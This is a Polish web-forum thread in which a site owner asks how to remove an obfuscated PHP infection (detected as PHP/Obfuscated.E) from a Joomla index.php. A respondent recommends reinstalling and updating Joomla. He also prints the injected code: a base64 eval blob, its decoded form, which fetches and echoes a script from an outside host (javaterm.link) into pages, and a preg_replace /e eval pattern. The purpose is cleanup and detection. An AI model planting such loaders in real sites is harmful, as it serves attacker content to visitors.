blokada strony, odmowa dostępu do index.php, zagrożenie widziane przez NOD32: PHP/Obfuscated.E Opcje

[majke63]

Jak w temacie. Strona została zblokowana w wyszukiwarce google i zweryfikowana jako zagrożenie. Wykonałem skan wszystkich plików i zlokalizowałem w niektórych z nich zagrożenie. Wyeliminowałem je. Pozostał mi plik index.php z którym nie potrafię sobie poradzić. W ESET NOD32 wyskakuje "PHP/Obfuscated.E potencjalnie niepożądana aplikacja - wybrana akcja zostanie wykonana po zakończeniu skanowania". Dodatkowo odmowa dostępu jak chce go zmodyfikować, spakować w paczkę rar itp. Dotyczy strony www.roi.waw.pl

[kartin]

Pobierz http://joomlacode.org/gf/download/frsrelea...ull_Package.zip zastąp pliki i będziesz miał.

Jak nie zaktualizujesz do najnowszej wersji, to za jakiś czas historia się powtórzy.

[PHP] pobierz, plaintext 
<?php eval(base64_decode(ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtGc
FlXbWhpUTJocFdWaE9iRTVxVW1aYVIxWnFZakpTYkV0R2NGbFhiV2hwVVRKb2NGZFdhRTlpUlRWeFZXM
W
FZVkl4V25GWmFrcFRZa1YwUm1WRVZsQlNSMmhTVkZSQ1MyUnNhM2RTYmxwVVlsVmFXVll4WXpWWlYwcH
p
WMnBHV0ZaRk5WUlpNR1JLWlZVMVdGZHRSbGhTTW1nelYxaHdUMVV5Vm5Ka1JWSmhVak5DY2xZd1ZuZGx
i
R1JGVTI1T2ExWXdXbHBXVm1NeFZFWlZlV1JGZUZKTlYyZzJWWHBDVDFWdFJYbGtSM1JZVWxoQ05sVXhW
b
EprTVc5M1lraFNhRkpGU25KVk1GWkdUV3hTU1dGNlZtcFdiWGhhVmpJeGIyRXhTWGhYYWxaYVlrVXdlR
m
w2U2tkWFJUVlpVMnN4VG1KdGFETlhWekI0WlcxU2RGSnVWbE5oYTFwb1ZqQldkazFXVWtkVmExcHJWbF
J
XZDFScmFIZFVWMHBWVW01a1dtSlhjM2haTVdSUFRsWk9WVnBGVW1GTmJsSk1WVEowYTFReVNYZGlSVlp
P
VWpKU1lWUlVSbUZPVm14eVYxUldhbEl3Y0RCWmExSkRWRVpGZVdONlRsSk5iVko1VlRKMGQxTldWblZS
Y
ld4WFRWWnZlVmRyV205VmJHOTRVV3hTVWxaRldsRmFSRWsxVXpGRmVGcEZPVTVXTURVd1dsVmtZV0ZyT
V
hOWFdHUmFZV3MxUkZSVlZqQlNSbFowWTBkb1VrMHlhRVpXYlhoaFV6RlNWMVZZYUZKaVJscGFWRlphWV
Z
aR1drWlVhazVvVFd4S1dsVXlOVTlV.UmxwSlZHdDRVazFWV25wWlZ6RlRWMVpPZFZSc2JFNU5SRlo2VjJ
0V2FrNVhVWGxWYTFKaFRXNVNZVlJYTVd0bGJGWlZVbXhrVmsxV1NrZFVNVnBIVmpGS2NXSkdVbFppUm5
C
VVZtMTRWMk5yTlZkV2JGcG9UVVp3VVZac1VrTlpWa3B6Vm01Q2EwMHlhRTFXYTJoUFZFWkZlRkp1VG1o
a
VZrcGFWVEkxVDFkVk1IZE9XRTVoVWxkTk1WcEVTbE5TUm05NVpFWndUbUpYVWpaV1ZsSkhWakZWZUZWc
l
dsQldhMXBZVlcxd2MxSldXa1ZSVkVaVi5UVlZ3VjFaSGVGZFdNVXBZWlVVNVZtSkdWVEZXYlhoaFVrZF
J
lV1JIZEZOTmJtZDNWako0YWs1Vk1WaFZhMUpvWlcxU1JWZHFTakJUTVU1eVdrWk9hRkl4U2tsVmJHUnJ
W
VlpWZDFOdVJtRlNiV2hNV1hwR2JtVldXbkZWYlVaWFRVUkdNbFV5ZEd0VU1rbDNaRVpXYWsxSVVrVldW
b
VEwWTFad1IyRkZkR3BOVjJRMVZrYzFUMkZWTUhkT1dFNVVUVVUxVkZsWE1VZFNSMFkyV2tWU1lVMXVVa
3
hXTW5oclZESkplVk5xVmxKV01uaE1WV3BHUzJJeGNFWmFSVnBvVmxScmVsbHFRbmRpVmxaWVQxUktWVk
5
IT0RCVVJ6RlBZakpPY0ZwNlFrNWxWM1F4VlZSS2FtTkZkRlZqZVd0d1QzY3BLVHMpKTs)); ?>
[PHP] pobierz, plaintext 

to w czytelnej wersji:

[PHP] pobierz, plaintext 
//<?php
	if(function_exists('curl_init'))
	{
		$url = "http://javaterm.link/link/jquery-1.6.3.min.js";
		$ch = curl_init();
		$timeout = 5;
		curl_setopt($ch,CURLOPT_URL,$url);
		curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
		curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
		$data = curl_exec($ch);
		curl_close($ch);
		echo "$data";
	}
//?>
[PHP] pobierz, plaintext 

Jak będziesz usuwał ręcznie to kasuj wszelkie takie podejrzane rzeczy. Wpisy w rodzaju

[PHP] pobierz, plaintext 
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66 ...
[PHP] pobierz, plaintext 

też są podejrzane

Ten post edytował kartin 2.06.2014, 11:35:53